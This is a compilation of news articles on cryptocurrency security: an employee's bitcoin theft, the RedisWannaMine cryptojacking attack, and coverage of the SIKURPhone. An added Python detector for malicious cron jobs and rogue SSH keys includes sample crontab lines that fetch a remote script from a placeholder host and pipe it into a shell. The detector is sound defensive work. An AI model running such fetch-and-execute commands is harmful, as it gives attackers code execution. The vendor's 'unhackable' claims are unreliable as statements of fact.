Chinese Engineer Arrested for Stealing 100 Bitcoin From His Own Company

By: Avi Mizrahi

Who Watches the Watchmen? An engineer from Beijing has been arrested after allegedly discovering a failed hacking attempt on his company and taking advantage of the situation to steal some of the money for himself. 90% of the loot has been returned, but he can still go to jail for as much as seven years.

An Inside Job

Zhong Mo, a tech company employee, allegedly used his position to steal 100 bitcoins from his employer. The Haidian police recently confirmed his arrest for the crime of illegally acquiring computer information. Haidian is the area where most universities are located in Beijing and contains the Zhongguancun electronics district where many tech companies have their Chinese headquarters, locally known as “China’s Silicon Valley.”

The prosecutors of the Science and Technology Criminal Investigation Department of Haidian investigated the case and found that the accused was an operation and maintenance engineer of a technology company. The claims are that during routine maintenance of the company’s server, he found out that someone had tried to steal the company’s cryptocurrency by hacking, but failed. After eliminating the abnormal interference, the engineer used his administrator’s authority to log in to the server himself and insert a piece of code to transfer 100 bitcoins from the company’s holdings to his own account registered on a website outside China. He also tried to eliminate traces of the act, taking steps to avoid tracking.

The Thief Falls Victim to Another Crime

After losing 10 bitcoins to a phishing scam and apparently getting cold feet, the employee returned the remaining 90 bitcoins to the company. According to the exchange rate at the time of the incident, September 16, 2017, 100 bitcoins were worth about $380,000. Local reports claim that this is the first case of bitcoin theft handled by the police in Beijing.

More: https://news.bitcoin.com/chinese-engineer-arrested-for-stealing-100-bitcoin-from-his-own-company/?utm_source=OneSignal%20Push&&utm_medium=notification&&utm_campaign=Push%20Notifications

Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers.

By: Charlie Osborne

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.
On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader used is more sophisticated than usual, as it also gains persistence through new entries in the server's crontab, and gains remote access to a victim machine through new SSH key entries in the authorized keys file, as well as new entries in the system’s iptables.

Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.

More: https://www-zdnet-com.cdn.ampproject.org/c/www.zdnet.com/google-amp/article/cryptojacking-attack-uses-leaked-nsa-exploit/
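
The crontab and authorized-keys persistence described in the RedisWannaMine report above can be checked for on a host. The following is an added example, not code from the article or from Imperva: it flags cron jobs that download content and pipe it to a shell, and SSH keys whose fingerprint is not on an approved list. The sample crontab, key blobs, host names and function names are all constructed for illustration.

```python
import base64
import hashlib
import re

# A fetch tool whose output is piped straight into a shell interpreter.
FETCH_PIPE = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|da|z)?sh\b")
KEY_TYPE = re.compile(r"^(?:ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-\S+|sk-\S+)$")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_commands(text):
    """Yield (line_no, command) for each job in a user crontab."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        # "@reboot cmd" has one schedule field, the classic form has five.
        n_sched = 1 if line.startswith("@") else 5
        parts = line.split(None, n_sched)
        if len(parts) > n_sched:
            yield no, parts[n_sched]

def suspicious_cron_jobs(text):
    """Return jobs that download content and pipe it to a shell."""
    return [(no, cmd) for no, cmd in cron_commands(text) if FETCH_PIPE.search(cmd)]

def fingerprint(blob_b64):
    """SHA256 fingerprint in the format printed by `ssh-keygen -l`."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def unapproved_keys(authorized_keys_text, approved):
    """Return (line_no, fingerprint, comment) for keys not in the approved set."""
    findings = []
    for no, raw in enumerate(authorized_keys_text.splitlines(), 1):
        tokens = raw.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        # Options may precede the key type, so locate the type token first.
        idx = next((i for i, t in enumerate(tokens) if KEY_TYPE.match(t)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue
        fp = fingerprint(tokens[idx + 1])
        if fp not in approved:
            findings.append((no, fp, " ".join(tokens[idx + 2:])))
    return findings

# Constructed sample data (not taken from the report).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=ops@example.invalid
15 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://updates.example.invalid/a.sh | sh
@reboot wget -q -O - http://updates.example.invalid/b.sh | bash
"""
ADMIN_BLOB = base64.b64encode(b"constructed admin key blob").decode()
ROGUE_BLOB = base64.b64encode(b"constructed unknown key blob").decode()
SAMPLE_KEYS = (
    f"ssh-ed25519 {ADMIN_BLOB} admin@bastion\n"
    f'no-pty,command="/bin/true" ssh-rsa {ROGUE_BLOB} root@localhost\n'
)
APPROVED = {fingerprint(ADMIN_BLOB)}
if __name__ == "__main__":
    print(suspicious_cron_jobs(SAMPLE_CRONTAB))
    print(unapproved_keys(SAMPLE_KEYS, APPROVED))
```

Run against real hosts, the inputs would be the output of `crontab -l` for each account and each user's `~/.ssh/authorized_keys`, with the approved set built from the keys the team has actually issued.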

This phone is an ultra-secure wallet for cryptocurrencies.

By: JORGE SANZ FERNÁNDEZ

The rise of cryptocurrencies is itself creating new segments and market niches in the mobile scene. Ultra-secure, encrypted phones have always existed, but over time they adapt to new technologies and trends. This time, the company SIKUR has set out to create an ultra-secure mid-range phone geared toward cryptocurrencies. In other words, a device so secure that we can carry on it everything related to our investments in these virtual currencies without fear of attacks and hacks.

It is impossible to hack

The biggest threat to our cryptocurrency wallet is hacking, and what this phone offers us is precisely total security when managing our wallet of Bitcoin or another cryptocurrency.

That is why SIKUR claims that its phone cannot be hacked. In fact, they gave a company with extensive hacking expertise, HackerOne, two months to hack this phone, and it proved impossible. Beyond that, it has a mid-range MediaTek processor, 4GB of RAM, a 5.5-inch Full HD screen, Android 7 and no ability to install apps other than SIKUR's. Only 20,000 units will be sold, at a price of 800 dollars, which is very high but in this case justified, because we are paying for security for our cryptocurrencies.

MORE: https://cincodias.elpais.com/cincodias/2018/03/02/smartphones/1519987623_886122.html

The 9 most exciting phones and gadgets from MWC 2018.

By: JEFFREY VAN CAMP

Every spring, the smartphone world revolves around Mobile World Congress. Exhibitors and attendees from more than 200 countries congregate in the halls of the Fira Gran Via in Barcelona, Spain, debuting the latest in mobile tech. MWC is the largest mobile trade show on Earth. We’ve surveyed the announcements from every major tech company at the show this week. Here are the highlights.
01
Samsung Galaxy S9
Price: $720
With the Galaxy S9, Samsung is doubling down on its winning formula. The new GS9 and S9+ have all the features Galaxy phones are known for, plus a few additions. Samsung moved the fingerprint sensor away from the camera so you won’t smudge the lens anymore, and photo performance in low light is improved thanks to the camera’s variable-aperture system. You also get Apple-inspired animated emoji and a new DeX dock that turns the phone into a desktop PC. Ships March 16 for $720. Choose the unlocked option. And did we mention it comes in Lilac Purple?
02
Nokia 8110 4G
Remember that phone from The Matrix where the receiver panel slid out to reveal the number pad? Take the blue pill because it’s back, courtesy of HMD Global, which now makes Nokia phones. The new Nokia 8110 comes shaped and colored like a banana too. The battery lasts over three weeks, but if you’re hoping for Android apps, look elsewhere. This is a standard old-school feature phone with its own download store—and, in true retro fashion, it comes with a copy of Snake.
03
Huawei MateBook X Pro
Just when you think there are no new capabilities to squeeze out of laptops, Huawei pushes the envelope. The new MateBook X Pro has a remarkable 14-inch 3,000 x 2,000 pixel touchscreen with such small bezels that it fits into a standard 12-inch notebook chassis. Huawei claims this ultraportable has the highest screen-to-body ratio of any laptop in the world. It’s also loaded with the latest Intel 8th Generation Core chips, an Nvidia GeForce MX150 graphics card, four Dolby Atmos-approved speakers, a fingerprint sensor, and 12-plus hours of battery life. The coolest detail: a webcam pops out of one of the function keys on the keyboard like the headlights on an old Corvette.
08
SikurPhone
Usually, a new phone at MWC will boast a fancy new screen or camera, but the SikurPhone’s sales pitch is strong security and data encryption. It claims that the SikurPhone is “hack-proof” and that its bespoke wallet app is the perfect way to keep your cryptocurrencies safe. It’s an Android phone with encryption plastered all over it, and a custom app store that only includes vetted apps. To back its claims, the company hired bug bounty hunters HackerOne to try to crack the phone. So far, the experts have failed. Sikur is asking $850 for the device, but that price includes peace of mind.

Secure phone for investing in bitcoin unveiled: what is it about?

By: Desiree Jaimovich

Barcelona (special correspondent). SikurPhone is a phone designed especially for those who have (or are interested in having) investments in bitcoin. It is supposed to offer greater convenience and security for managing cryptocurrencies, for several reasons.

The phone has its “own” operating system, which in reality is nothing more than a customized version of Android 7.0. Applications cannot be downloaded from Google Play on the phone, only those designed specifically within the company's ecosystem.

Because it has no contact with third-party apps, the phone is less exposed to being hacked, notes Alexandre Vasconcelos, a Sikur spokesperson. This is a good point, considering that in 2017 alone Google had to remove some 700,000 malicious applications and expel more than 100,000 developers from its store for attempting to harm the devices of the 2 billion Android users worldwide.

The phone's creators say that in the last week alone they subjected the device to testing by a hundred hackers and none managed to break through the system's security barriers.

MORE: https://www.infobae.com/america/tecno/2018/03/01/presentan-un-telefono-seguro-para-invertir-en-bitcoins-de-que-se-trata/

Security-Focused ‘SIKURPhone’ Announced at MWC 2018

By: AFP Relaxnews

Earlier this week at MWC 2018 in Barcelona, German cybersecurity company Sikur launched SIKURPhone, a smartphone designed to protect data as well as cryptocurrency.

Sikur’s new encrypted smartphone has been tried and tested by hackers, to ensure users’ cryptocurrencies, such as Bitcoin, are safe from theft. Such a device may have only appealed to those carrying around delicate corporate data or sensitive government documents a few years ago. But in today’s world of hackers, set on trying their luck in a cryptocurrency market worth over $460 billion, a lot more people have a lot more to lose.

SIKURPhone is ultimately a practical choice rather than a flashy one — the specs remain mediocre and nowhere near those of a flagship item. A little smaller than an iPhone, the device has a 5.5-inch full high definition ‘gorilla glass’ display, 4GB of RAM, 64GB of storage, a 13MP rear camera and a 5MP front camera. Where it does stand out from the crowd is in its “unhackable” built-in cryptocurrency wallet, tailored to safeguard digital coins, such as Bitcoin. The company is so confident about its new device that it even put it to the test, hiring professional hackers to do “rigorous hacking tests for two months.” Hackers ultimately failed to break in.

SIKURPhone essentially runs on Android, although it is an altered version that provides the basics: calls, messages, document storage, etc. As for third-party apps, such as Instagram and Facebook, they will eventually be accessible but not before being vetted for privacy concerns by the company. According to Sikur, the phone’s fingerprint authentication function can also be used to recover personal data in the case of a lost device or a forgotten password.

More: https://www.news18.com/news/tech/security-focused-sikurphone-announced-at-mwc-2018-1674481.html

SikurPhone With a Secure Cryptocurrency Wallet Unveiled at MWC 2018.

By: Jagmeet Singh

A long time after launching its security-focused GranitePhone, Brazil’s Sikur at Mobile World Congress (MWC) 2018 in Barcelona on Tuesday brought the SikurPhone that helps you protect your cryptocurrency. The new smartphone comes with a pre-installed cryptocurrency wallet and includes cloud integration to securely store various cryptocurrencies under one roof. Pre-orders for 20,000 units for the SikurPhone have already started at a promotional price of $799 (roughly Rs. 52,100), while the units will ship sometime in August this year.

The SikurPhone is touted to be “hack proof”, protecting user data as well as cryptocurrencies from hackers. To test how the phone can protect users, Sikur hired ethical hackers from bug bounty company HackerOne between November and December, who failed to gain access to any information, as per COO Alexandre Vasconcelos. The company deployed a custom Android version on SikurPhone, which it calls SikurOS, that doesn’t allow you to install any third-party apps on your own. This doesn’t mean that the smartphone won’t support your favourite apps – you instead need to ask the Sikur team to configure the apps individually.

Vasconcelos, in an interaction with CNET, pointed out that while the SikurPhone is designed to protect user data, it will not give the same tough protection to criminals. The executive highlighted that the company would disable access to its services if it gets hints of any criminal behaviour by a user. In a separate interview with Mashable, Vasconcelos revealed that Sikur will not only secure your digital currencies through its cloud-connected wallet but will also remotely wipe the data if you lose your phone, to protect your money. “If you lose your phone, we can remotely wipe it for you. You can get a new one, log in, and your funds will be safe, as your private keys are stored in our cloud,” he said.

The SikurPhone additionally includes fingerprint authentication, and the preloaded wallet offers up-to-date market information about pricing, cryptocurrency news, and quotes. The wallet also has multisignature (P2SH) and multiple wallet support to give you an extensive cryptocurrency platform.

On the specification side, the Android 7.0 Nougat-based SikurPhone features a 5.5-inch full-HD display with Gorilla Glass protection on top. It is powered by a MediaTek MT6750 SoC, coupled with 4GB of RAM, and has a 13-megapixel rear camera sensor and a front camera sensor. Also, there is 64GB of onboard storage and a 2800mAh battery.

More: https://gadgets.ndtv.com/mobiles/news/sikurphone-cryptocurrency-wallet-mwc-2018-1818260

Encrypted SIKURPhone protects data and cryptocurrency

By: Rob LeFebvre

The security-focused Granite Phone captured the interest of even non-corporate customers when it came out in 2015. Now the folks at Sikur are back with a next-generation , promising the first fully encrypted, hack-proof smartphone that can safely store cryptocurrencies. Only 20,000 units will be available for presale beginning February 27th at a promotional price of $799. The company expects to deliver them in August of this year.

The phone itself has a 5.5-inch “full HD” Gorilla Glass display, 4GB of RAM, 64GB of storage, a 13MP rear and 5MP front camera and sports a 2800 mAh battery. SIKURPhone also sports fingerprint authentication, which the company claims can help recover personal data if the device gets lost or you forget your password. It runs a fork of Android, and any third-party apps must be vetted and confirmed by the company before they’re available in an upcoming app store.

When the original Granite Phone came out, it was essentially for security-conscious governmental and corporate users, but the device found a pretty strong foothold with everyday consumers. SIKURPhone adds a secure cryptocurrency wallet along with its secure OS, communication systems and third-party apps. “Securely storing information on our devices is one of our strong points,” said CEO Cristiano Iop. “We succeeded with browser and messaging security. Then we asked, why not do it with ? Cryptos are stored seamlessly and securely on our cloud, without compromising safety.”

MORE: https://www.engadget.com/2018/02/27/sikurphone-encrypted-data-cryptocurrency-pre-order/

There’s a $799 hack-proof smartphone designed to keep your cryptocurrencies safe

By: ARJUN KHARPAL

February 27, 2018

A smartphone designed to keep cryptocurrencies like bitcoin safe was unveiled on Tuesday.

German cybersecurity firm Sikur launched the $799 SIKURPhone at the Mobile World Congress in Barcelona, Spain.

Key features include:

  • 5.5-inch full high definition display
  • 13 megapixel rear camera

But the standout feature for the device is the in-built cryptocurrency wallet. A wallet is a piece of software required to hold cryptocurrencies.

Security of cryptocurrency exchanges and wallets has been in the spotlight recently. A recent incident saw hackers steal over $500 million from Japanese cryptocurrency exchange Coincheck.

The cryptocurrency market has exploded with a value of over $460 billion, from just $21.4 billion a year ago, according to data from Coinmarketcap.com.

Sikur said it put its device to the test by hiring professional hackers to attack the device. The company claims the smartphone was subjected to “rigorous hacking tests for two months,” but hackers failed to gain access to any information.

“At the end of second quarter of 2018 we will deliver a crypto wallet inside our platform, expanding the wallet use beyond SIKURPhone, it means that our customers should be able, through a physical device, to securely store their cryptocoins,” Cristiano Iop, Sikur’s CEO, told CNBC by email.

The SIKURPhone will be available in a pre-sale on February 27 at a price of $799, and the first units will be delivered in August 2018. Only 20,000 units will be available at this price.

Source: https://www.cnbc.com/2018/02/27/sikur-cryptocurrency-wallet-smartphone.html

Sikur’s COO: Hacker diversity essential in securing SIKURPhone

By: Hacker One

German cybersecurity company Sikur has high demands for security – its Secure Communication Platform is utilized by governments, corporations, and high-level executives.

In addition, the company just announced a new cryptocurrency wallet for its secure mobile device, SIKURPhone at Mobile World Congress in Barcelona.

Ahead of this new product launch, Sikur ran a HackerOne challenge with highly skilled hackers focused on everything from hardware to software to physical phone theft. We chatted with Sikur COO Alexandre Vasconcelos, who was in charge of the program, to learn more about how hackers serve as an essential component of Sikur’s overall security strategy.

Why did you choose to run a hacker-powered security test versus a standard penetration test?

When crafting such a device with a specific purpose our goal is to keep user information safe from any prying eyes, so when submitting the SIKURPhone to researchers we expected that they would test things that we had missed.

A standard penetration test may depend on the unique ability of the tester who – by the way – can be an exceptional tester, but it will not cover all the product technical aspects. On the flip side, a hacker-powered test is far more extensive, due to its nature of having more testers and with different backgrounds, which contributes to the hacking process. By this approach, the program is more effective and proved that our device has accomplished its purpose, keeping user information (stored locally, in the cloud or in transit) secure from any third-party.

You focused on three test plan areas: accessing a “stolen” phone, breaking a purchased phone, and intercepting data. Why these three areas?

That’s because we think that those are the most common situations where hacking occurs. When a malicious person gains access to your device, chances are that a local exploitable flaw may be found. Having researchers help to prove that was crucial to our product.

The proposed “stolen” phone scenarios were important to set real world situations that any user could face. Our goal was to prove that users would benefit from SIKURPhone security, keeping their information safe even in the worst situations, like a device theft.

There were no limitations during the testing phase, hackers were allowed – and encouraged – to search for hardware and software vulnerabilities.

Did they find any vulnerabilities that surprised you (no need to name the vulnerability, just explain the process or why it was surprising)?

In fact, we were surprised by the way that hackers worked to find the issues, the approach was very interesting and effective.

Talk to us about the hardware component of your challenge and how it's different from software-based security.

Hardware is far more difficult, because it has some very particular components that work together with software. Also, when it comes to hardware, when a vulnerability is found, deeper testing is needed to guarantee that the fix will not affect other components.

We do have some engineers with hardware expertise, and it is a very particular profile, as they also need to have software skills to help implement the solution as a hacker would, thus setting the security bar higher. HackerOne helped us a lot to find the right hacker profile for our challenge; they did a very good job.

How did HackerOne’s managed services (triage) help you and your team during the Challenge?

The triaging service is crucial to both sides, so that hackers can have a better understanding of how the customer’s product works, and on the flip side the customer may have a clearer understanding of the hacker approach to a given situation. Some things that may seem to be an issue are made by design, and some can be classified as bugs. The triage service gave us room to work on those situations.

How did the hacker-powered penetration test via HackerOne Challenge compare with your past penetration tests?

We did have some tests before, but as technology and hacking techniques evolve, there is always something to learn and improve. We always learn something new. In this challenge we gained a lot of knowledge that will help to improve our skills.

MORE: https://www.hackerone.com/blog/Sikurs-COO-Hacker-Diversity-Essential-Securing-SIKURPhone